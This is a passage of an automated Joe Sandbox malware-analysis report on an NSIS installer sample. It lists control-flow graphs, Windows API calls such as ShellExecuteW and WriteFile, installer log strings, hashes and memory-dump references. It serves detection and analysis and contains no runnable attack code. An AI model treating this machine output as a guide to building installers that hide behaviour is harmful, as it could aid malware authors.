                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                        • Jump: %d, xrefs: 00401602
                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                        • BringToFront, xrefs: 004016BD
                                        • Sleep(%d), xrefs: 0040169D
                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                        • Call: %d, xrefs: 0040165A
                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                        • Rename on reboot: %s, xrefs: 00401943
                                        • Aborting: "%s", xrefs: 0040161D
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                        • API String ID: 2872004960-3619442763
                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                        APIs
                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 608394941-1650083594
                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                        • CompareFileTime.KERNEL32(-00000014,?,PetFunctions,PetFunctions,00000000,00000000,PetFunctions,004CB0B0,00000000,00000000), ref: 00401AA0
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$PetFunctions
                                        • API String ID: 4286501637-2463230398
                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403598
                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                        Strings
                                        • Null, xrefs: 0040367E
                                        • Inst, xrefs: 0040366C
                                        • Error launching installer, xrefs: 004035D7
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                        • soft, xrefs: 00403675
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 4283519449-527102705
                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004033E7
                                        • GetTickCount.KERNEL32 ref: 00403464
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                        • wsprintfW.USER32 ref: 004034A4
                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CountFileTickWrite$wsprintf
                                        • String ID: ... %d%%$P1B$X1C$X1C
                                        • API String ID: 651206458-1535804072
                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                        APIs
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GlobalFree.KERNELBASE(007E1ED0), ref: 00402387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FreeGloballstrcpyn
                                        • String ID: Exch: stack < %d elements$PetFunctions$Pop: stack empty
                                        • API String ID: 1459762280-1025396974
                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        • GlobalFree.KERNELBASE(007E1ED0), ref: 00402387
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 3376005127-0
                                        • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                        • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                        • String ID:
                                        • API String ID: 2568930968-0
                                        • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                        • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                                        APIs
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                        • API String ID: 3156913733-2180253247
                                        • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                        • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
